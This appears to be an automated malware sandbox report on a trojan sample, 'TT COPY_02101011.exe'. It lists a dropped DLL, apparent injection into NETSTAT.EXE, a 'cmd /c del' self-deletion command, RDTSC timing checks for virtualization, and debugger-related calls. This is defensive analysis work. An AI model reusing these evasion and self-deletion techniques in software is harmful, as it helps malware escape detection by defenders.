          Source: classification engineClassification label: mal100.troj.evad.winEXE@8/2@13/8
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 0_2_00402012 CoCreateInstance,MultiByteToWideChar,0_2_00402012
          Source: C:\Users\user\Desktop\TT COPY_02101011.exe File read: C:\Users\desktop.ini
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 0_2_0040411B GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_0040411B
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:808:120:WilError_01
          Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
          Source: Binary string: wntdll.pdbUGP source: TT COPY_02101011.exe, 00000000.00000003.677689499.0000000002A70000.00000004.00000001.sdmp, TT COPY_02101011.exe, 00000000.00000003.677942746.0000000002C00000.00000004.00000001.sdmp, TT COPY_02101011.exe, 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, TT COPY_02101011.exe, 00000001.00000002.746909358.0000000000B8F000.00000040.00000001.sdmp, NETSTAT.EXE, 00000009.00000002.935582274.00000000031F0000.00000040.00000001.sdmp, NETSTAT.EXE, 00000009.00000002.935695705.000000000330F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: TT COPY_02101011.exe, TT COPY_02101011.exe, 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, TT COPY_02101011.exe, 00000001.00000002.746909358.0000000000B8F000.00000040.00000001.sdmp, NETSTAT.EXE, NETSTAT.EXE, 00000009.00000002.935582274.00000000031F0000.00000040.00000001.sdmp, NETSTAT.EXE, 00000009.00000002.935695705.000000000330F000.00000040.00000001.sdmp
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 0_2_100116A5 push ecx; ret 0_2_100116B8
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_0041C060 push edx; ret 1_2_0041C152
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_0041B832 push eax; ret 1_2_0041B838
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_0041B83B push eax; ret 1_2_0041B8A2
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_0041B89C push eax; ret 1_2_0041B8A2
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_004153BE pushfd ; ret 1_2_004153C0
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_0041551B push ecx; iretd 1_2_0041551D
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_0041B7E5 push eax; ret 1_2_0041B838
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AED0D1 push ecx; ret 1_2_00AED0E4
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0326D0D1 push ecx; ret 9_2_0326D0E4
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0077C060 push edx; ret 9_2_0077C152
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0077B832 push eax; ret 9_2_0077B838
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0077B83B push eax; ret 9_2_0077B8A2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0077B89C push eax; ret 9_2_0077B8A2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_007753BE pushfd ; ret 9_2_007753C0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0077551B push ecx; iretd 9_2_0077551D
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0077B7E5 push eax; ret 9_2_0077B838
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 0_2_00405C49 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00405C49
          Source: C:\Users\user\Desktop\TT COPY_02101011.exe File created: C:\Users\user\AppData\Local\Temp\nshA78C.tmp\wdtzbwxasut.dll (dropped file)

          Hooking and other Techniques for Hiding and Protection:

          Self deletion via cmd delete
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: /c del "C:\Users\user\Desktop\TT COPY_02101011.exe"
          Source: C:\Users\user\Desktop\TT COPY_02101011.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeRDTSC instruction interceptor: First address: 0000000000408614 second address: 000000000040861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeRDTSC instruction interceptor: First address: 00000000004089AE second address: 00000000004089B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\NETSTAT.EXERDTSC instruction interceptor: First address: 0000000000768614 second address: 000000000076861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\NETSTAT.EXERDTSC instruction interceptor: First address: 00000000007689AE second address: 00000000007689B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\explorer.exe TID: 6084 Thread sleep time: -50000s >= -30000s
          Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 6328 Thread sleep time: -44000s >= -30000s
          Source: C:\Windows\SysWOW64\NETSTAT.EXELast function: Thread delayed
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_004088E0 rdtsc 1_2_004088E0
          Source: C:\Users\user\Desktop\TT COPY_02101011.exe Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 0_2_00405250 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00405250
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 0_2_00405C22 FindFirstFileA,FindClose,0_2_00405C22
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 0_2_00402630 FindFirstFileA,0_2_00402630
          Source: explorer.exe, 00000004.00000000.713532059.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.725756968.0000000006650000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.684710887.0000000004710000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
          Source: explorer.exe, 00000004.00000000.713777981.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
          Source: explorer.exe, 00000004.00000000.713777981.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 0_2_10013220 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_10013220
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 0_2_00405C49 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00405C49
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 0_2_10001000 GetProcessHeap,HeapAlloc,RegCreateKeyExW,GetProcessHeap,HeapFree,0_2_10001000
          Source: C:\Users\user\Desktop\TT COPY_02101011.exe Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Process token adjusted: Debug
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00A99240 mov eax, dword ptr fs:[00000030h]1_2_00A99240
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AC4BAD mov eax, dword ptr fs:[00000030h]1_2_00AC4BAD
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AC4BAD mov eax, dword ptr fs:[00000030h]1_2_00AC4BAD
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AC4BAD mov eax, dword ptr fs:[00000030h]1_2_00AC4BAD
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B65BA5 mov eax, dword ptr fs:[00000030h]1_2_00B65BA5
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AA1B8F mov eax, dword ptr fs:[00000030h]1_2_00AA1B8F
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AA1B8F mov eax, dword ptr fs:[00000030h]1_2_00AA1B8F
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B4D380 mov ecx, dword ptr fs:[00000030h]1_2_00B4D380
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AC2397 mov eax, dword ptr fs:[00000030h]1_2_00AC2397
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00ACB390 mov eax, dword ptr fs:[00000030h]1_2_00ACB390
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B5138A mov eax, dword ptr fs:[00000030h]1_2_00B5138A
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00ABDBE9 mov eax, dword ptr fs:[00000030h]1_2_00ABDBE9
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AC03E2 mov eax, dword ptr fs:[00000030h]1_2_00AC03E2
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AC03E2 mov eax, dword ptr fs:[00000030h]1_2_00AC03E2
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AC03E2 mov eax, dword ptr fs:[00000030h]1_2_00AC03E2
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AC03E2 mov eax, dword ptr fs:[00000030h]1_2_00AC03E2
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AC03E2 mov eax, dword ptr fs:[00000030h]1_2_00AC03E2
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AC03E2 mov eax, dword ptr fs:[00000030h]1_2_00AC03E2
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B153CA mov eax, dword ptr fs:[00000030h]1_2_00B153CA
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B153CA mov eax, dword ptr fs:[00000030h]1_2_00B153CA
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B5131B mov eax, dword ptr fs:[00000030h]1_2_00B5131B
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00A9DB60 mov ecx, dword ptr fs:[00000030h]1_2_00A9DB60
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AC3B7A mov eax, dword ptr fs:[00000030h]1_2_00AC3B7A
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AC3B7A mov eax, dword ptr fs:[00000030h]1_2_00AC3B7A
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00A9DB40 mov eax, dword ptr fs:[00000030h]1_2_00A9DB40
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B68B58 mov eax, dword ptr fs:[00000030h]1_2_00B68B58
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00A9F358 mov eax, dword ptr fs:[00000030h]1_2_00A9F358
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AA849B mov eax, dword ptr fs:[00000030h]1_2_00AA849B
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B16CF0 mov eax, dword ptr fs:[00000030h]1_2_00B16CF0
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B16CF0 mov eax, dword ptr fs:[00000030h]1_2_00B16CF0
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B16CF0 mov eax, dword ptr fs:[00000030h]1_2_00B16CF0
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B514FB mov eax, dword ptr fs:[00000030h]1_2_00B514FB
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B68CD6 mov eax, dword ptr fs:[00000030h]1_2_00B68CD6
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00ACBC2C mov eax, dword ptr fs:[00000030h]1_2_00ACBC2C
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B51C06 mov eax, dword ptr fs:[00000030h]1_2_00B51C06
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B51C06 mov eax, dword ptr fs:[00000030h]1_2_00B51C06
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B51C06 mov eax, dword ptr fs:[00000030h]1_2_00B51C06
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B51C06 mov eax, dword ptr fs:[00000030h]1_2_00B51C06
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B51C06 mov eax, dword ptr fs:[00000030h]1_2_00B51C06
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B51C06 mov eax, dword ptr fs:[00000030h]1_2_00B51C06
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B51C06 mov eax, dword ptr fs:[00000030h]1_2_00B51C06
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B51C06 mov eax, dword ptr fs:[00000030h]1_2_00B51C06
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B51C06 mov eax, dword ptr fs:[00000030h]1_2_00B51C06
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B51C06 mov eax, dword ptr fs:[00000030h]1_2_00B51C06
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B51C06 mov eax, dword ptr fs:[00000030h]1_2_00B51C06
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B51C06 mov eax, dword ptr fs:[00000030h]1_2_00B51C06
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B51C06 mov eax, dword ptr fs:[00000030h]1_2_00B51C06
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B51C06 mov eax, dword ptr fs:[00000030h]1_2_00B51C06
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B6740D mov eax, dword ptr fs:[00000030h]1_2_00B6740D
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B6740D mov eax, dword ptr fs:[00000030h]1_2_00B6740D
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B6740D mov eax, dword ptr fs:[00000030h]1_2_00B6740D
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B16C0A mov eax, dword ptr fs:[00000030h]1_2_00B16C0A
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B16C0A mov eax, dword ptr fs:[00000030h]1_2_00B16C0A
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B16C0A mov eax, dword ptr fs:[00000030h]1_2_00B16C0A
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B16C0A mov eax, dword ptr fs:[00000030h]1_2_00B16C0A
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AB746D mov eax, dword ptr fs:[00000030h]1_2_00AB746D
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B2C450 mov eax, dword ptr fs:[00000030h]1_2_00B2C450
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B2C450 mov eax, dword ptr fs:[00000030h]1_2_00B2C450
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00ACA44B mov eax, dword ptr fs:[00000030h]1_2_00ACA44B
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AC35A1 mov eax, dword ptr fs:[00000030h]1_2_00AC35A1
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AC1DB5 mov eax, dword ptr fs:[00000030h]1_2_00AC1DB5
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AC1DB5 mov eax, dword ptr fs:[00000030h]1_2_00AC1DB5
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AC1DB5 mov eax, dword ptr fs:[00000030h]1_2_00AC1DB5
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B605AC mov eax, dword ptr fs:[00000030h]1_2_00B605AC
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B605AC mov eax, dword ptr fs:[00000030h]1_2_00B605AC
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00A92D8A mov eax, dword ptr fs:[00000030h]1_2_00A92D8A
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00A92D8A mov eax, dword ptr fs:[00000030h]1_2_00A92D8A
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00A92D8A mov eax, dword ptr fs:[00000030h]1_2_00A92D8A
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00A92D8A mov eax, dword ptr fs:[00000030h]1_2_00A92D8A
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00A92D8A mov eax, dword ptr fs:[00000030h]1_2_00A92D8A
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AC2581 mov eax, dword ptr fs:[00000030h]1_2_00AC2581
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AC2581 mov eax, dword ptr fs:[00000030h]1_2_00AC2581
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AC2581 mov eax, dword ptr fs:[00000030h]1_2_00AC2581
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AC2581 mov eax, dword ptr fs:[00000030h]1_2_00AC2581
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00ACFD9B mov eax, dword ptr fs:[00000030h]1_2_00ACFD9B
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00ACFD9B mov eax, dword ptr fs:[00000030h]1_2_00ACFD9B
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B48DF1 mov eax, dword ptr fs:[00000030h]1_2_00B48DF1
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AAD5E0 mov eax, dword ptr fs:[00000030h]1_2_00AAD5E0
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AAD5E0 mov eax, dword ptr fs:[00000030h]1_2_00AAD5E0
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B5FDE2 mov eax, dword ptr fs:[00000030h]1_2_00B5FDE2
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B5FDE2 mov eax, dword ptr fs:[00000030h]1_2_00B5FDE2
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B5FDE2 mov eax, dword ptr fs:[00000030h]1_2_00B5FDE2
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B5FDE2 mov eax, dword ptr fs:[00000030h]1_2_00B5FDE2
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B16DC9 mov eax, dword ptr fs:[00000030h]1_2_00B16DC9
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B16DC9 mov eax, dword ptr fs:[00000030h]1_2_00B16DC9
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B16DC9 mov eax, dword ptr fs:[00000030h]1_2_00B16DC9
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B16DC9 mov ecx, dword ptr fs:[00000030h]1_2_00B16DC9
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B16DC9 mov eax, dword ptr fs:[00000030h]1_2_00B16DC9
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B16DC9 mov eax, dword ptr fs:[00000030h]1_2_00B16DC9
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B68D34 mov eax, dword ptr fs:[00000030h]1_2_00B68D34
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B1A537 mov eax, dword ptr fs:[00000030h]1_2_00B1A537
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B5E539 mov eax, dword ptr fs:[00000030h]1_2_00B5E539
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AC4D3B mov eax, dword ptr fs:[00000030h]1_2_00AC4D3B
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AC4D3B mov eax, dword ptr fs:[00000030h]1_2_00AC4D3B
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AC4D3B mov eax, dword ptr fs:[00000030h]1_2_00AC4D3B
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00A9AD30 mov eax, dword ptr fs:[00000030h]1_2_00A9AD30
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AA3D34 mov eax, dword ptr fs:[00000030h]1_2_00AA3D34
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AA3D34 mov eax, dword ptr fs:[00000030h]1_2_00AA3D34
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AA3D34 mov eax, dword ptr fs:[00000030h]1_2_00AA3D34
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AA3D34 mov eax, dword ptr fs:[00000030h]1_2_00AA3D34
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AA3D34 mov eax, dword ptr fs:[00000030h]1_2_00AA3D34
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AA3D34 mov eax, dword ptr fs:[00000030h]1_2_00AA3D34
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AA3D34 mov eax, dword ptr fs:[00000030h]1_2_00AA3D34
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AA3D34 mov eax, dword ptr fs:[00000030h]1_2_00AA3D34
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AA3D34 mov eax, dword ptr fs:[00000030h]1_2_00AA3D34
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AA3D34 mov eax, dword ptr fs:[00000030h]1_2_00AA3D34
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AA3D34 mov eax, dword ptr fs:[00000030h]1_2_00AA3D34
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AA3D34 mov eax, dword ptr fs:[00000030h]1_2_00AA3D34
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AA3D34 mov eax, dword ptr fs:[00000030h]1_2_00AA3D34
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00ABC577 mov eax, dword ptr fs:[00000030h]1_2_00ABC577
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00ABC577 mov eax, dword ptr fs:[00000030h]1_2_00ABC577
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AD3D43 mov eax, dword ptr fs:[00000030h]1_2_00AD3D43
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B13540 mov eax, dword ptr fs:[00000030h]1_2_00B13540
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AB7D50 mov eax, dword ptr fs:[00000030h]1_2_00AB7D50
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B60EA5 mov eax, dword ptr fs:[00000030h]1_2_00B60EA5
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B60EA5 mov eax, dword ptr fs:[00000030h]1_2_00B60EA5
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B60EA5 mov eax, dword ptr fs:[00000030h]1_2_00B60EA5
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B146A7 mov eax, dword ptr fs:[00000030h]1_2_00B146A7
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B2FE87 mov eax, dword ptr fs:[00000030h]1_2_00B2FE87
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AA76E2 mov eax, dword ptr fs:[00000030h]1_2_00AA76E2
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AC16E0 mov ecx, dword ptr fs:[00000030h]1_2_00AC16E0
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B68ED6 mov eax, dword ptr fs:[00000030h]1_2_00B68ED6
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AC36CC mov eax, dword ptr fs:[00000030h]1_2_00AC36CC
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AD8EC7 mov eax, dword ptr fs:[00000030h]1_2_00AD8EC7
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B4FEC0 mov eax, dword ptr fs:[00000030h]1_2_00B4FEC0
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00A9E620 mov eax, dword ptr fs:[00000030h]1_2_00A9E620
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B4FE3F mov eax, dword ptr fs:[00000030h]1_2_00B4FE3F
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03293884 mov eax, dword ptr fs:[00000030h]9_2_03293884
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032140E1 mov eax, dword ptr fs:[00000030h]9_2_032140E1
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032140E1 mov eax, dword ptr fs:[00000030h]9_2_032140E1
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032140E1 mov eax, dword ptr fs:[00000030h]9_2_032140E1
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032158EC mov eax, dword ptr fs:[00000030h]9_2_032158EC
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032AB8D0 mov eax, dword ptr fs:[00000030h]9_2_032AB8D0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032AB8D0 mov ecx, dword ptr fs:[00000030h]9_2_032AB8D0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032AB8D0 mov eax, dword ptr fs:[00000030h]9_2_032AB8D0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032AB8D0 mov eax, dword ptr fs:[00000030h]9_2_032AB8D0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032AB8D0 mov eax, dword ptr fs:[00000030h]9_2_032AB8D0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032AB8D0 mov eax, dword ptr fs:[00000030h]9_2_032AB8D0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03214F2E mov eax, dword ptr fs:[00000030h]9_2_03214F2E
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03214F2E mov eax, dword ptr fs:[00000030h]9_2_03214F2E
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0324E730 mov eax, dword ptr fs:[00000030h]9_2_0324E730
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032E070D mov eax, dword ptr fs:[00000030h]9_2_032E070D
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032E070D mov eax, dword ptr fs:[00000030h]9_2_032E070D
